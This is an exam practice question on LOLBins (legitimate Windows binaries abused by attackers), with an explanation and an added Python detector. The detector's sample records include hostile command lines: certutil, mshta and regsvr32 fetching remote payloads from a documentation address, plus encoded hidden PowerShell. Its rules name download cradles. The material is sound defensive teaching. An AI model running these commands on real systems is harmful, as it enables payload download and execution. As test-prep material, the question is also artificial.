Which term is used to describe the tactic of using legitimate Windows binaries for malicious purposes?

Practice question for the SANS Advanced Incident Response exam.

Multiple Choice

Which term is used to describe the tactic of using legitimate Windows binaries for malicious purposes?

Explanation:
Using legitimate Windows binaries to perform malicious actions is described by the term LOLBin (Living off the Land Binary). Attackers repurpose trusted, usually Microsoft-signed system executables such as cmd.exe, powershell.exe, mshta.exe, regsvr32.exe, rundll32.exe and certutil.exe to download payloads, execute commands or scripts, bypass application allow-listing, and stage or exfiltrate data, all without dropping a custom tool that a file signature could match. Because these binaries are legitimate parts of the OS and run constantly for benign reasons, their mere presence is not an indicator; detection depends on context: atypical command-line arguments (certutil with -urlcache and a URL, mshta pointed at an HTA on the web, regsvr32 with /i: and a remote scriptlet, powershell with an encoded command), unusual parent-child relationships (an Office application or mail client spawning a shell or script host), and execution by unexpected users, on unexpected hosts, or at unexpected times. The expanded form, Living off the Land Binaries, conveys the same idea; the broader tactic of relying on what is already present on the host is called Living off the Land, and LOLBin is the commonly used label for the binaries themselves. The community-maintained LOLBAS project catalogs these binaries together with the functions that can be abused.
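Detection logic of the kind the explanation describes, run over constructed process-creation records. This is an added example, not code from the page or from the exam vendor. It assumes three fields per event (image path, command line, parent image), a small illustrative rule set, and its own helper names (ProcEvent, basename, detect); the sample records are constructed, with 198.51.100.7 used as a documentation address.

```python
"""Flag suspicious use of Windows LOLBins in process-creation telemetry.

Added example, not part of the original page. The records below are
constructed to resemble the core fields of a Sysmon Event ID 1 (or Windows
Security 4688) process-creation event: image path, command line and parent
image. The rule set and the helper names are this example's own assumptions;
the argument patterns are illustrative, not a complete catalogue.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str         # full path of the created process
    cmdline: str       # its command line as logged
    parent_image: str  # full path of the parent process


# Office and mail clients rarely have a legitimate reason to launch a shell or
# script host; the parent-child pairing is the signal, whatever the arguments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                  "cscript.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}

# Per-binary argument patterns that have no place in routine admin use.
ARG_RULES = {
    "certutil.exe": [
        (re.compile(r"-urlcache\b.*https?://|https?://.*-urlcache\b", re.I),
         "certutil used as a downloader"),
        (re.compile(r"-decode\b", re.I),
         "certutil used to decode a base64 payload"),
    ],
    "mshta.exe": [
        (re.compile(r"https?://|javascript:|vbscript:", re.I),
         "mshta executing remote or inline script"),
    ],
    "regsvr32.exe": [
        (re.compile(r"/i:\s*https?://|scrobj\.dll", re.I),
         "regsvr32 loading a remote scriptlet"),
    ],
    "rundll32.exe": [
        (re.compile(r"javascript:", re.I),
         "rundll32 executing inline JavaScript"),
    ],
    "powershell.exe": [
        (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I),
         "encoded PowerShell command"),
        (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression", re.I),
         "PowerShell download cradle"),
    ],
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (image, reason) findings for every rule an event trips.

    One event can yield more than one finding: an Office parent spawning
    mshta.exe with a remote HTA trips both the parent-child rule and the
    mshta argument rule.
    """
    findings = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        if parent in OFFICE_PARENTS and img in SHELL_CHILDREN:
            findings.append((img, f"{parent} spawned {img}"))
        for pattern, reason in ARG_RULES.get(img, []):
            if pattern.search(ev.cmdline):
                findings.append((img, reason))
    return findings


# Constructed sample telemetry: two benign records followed by four abusive ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              "certutil -store My",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              "cmd.exe",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              "mshta http://198.51.100.7/x.hta",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              "regsvr32 /s /n /u /i:http://198.51.100.7/s.sct scrobj.dll",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgA",
              r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"),
]


if __name__ == "__main__":
    for image, reason in detect(SAMPLE_EVENTS):
        print(f"{image:16s} {reason}")
```

The two benign records produce no findings, which is the point: certutil.exe and cmd.exe by themselves are noise, and only the arguments and the parent process separate the four abusive records from them. In production the same rules would be expressed in the SIEM or EDR query language, and the argument patterns would be tuned against the environment's own baseline of administrative use.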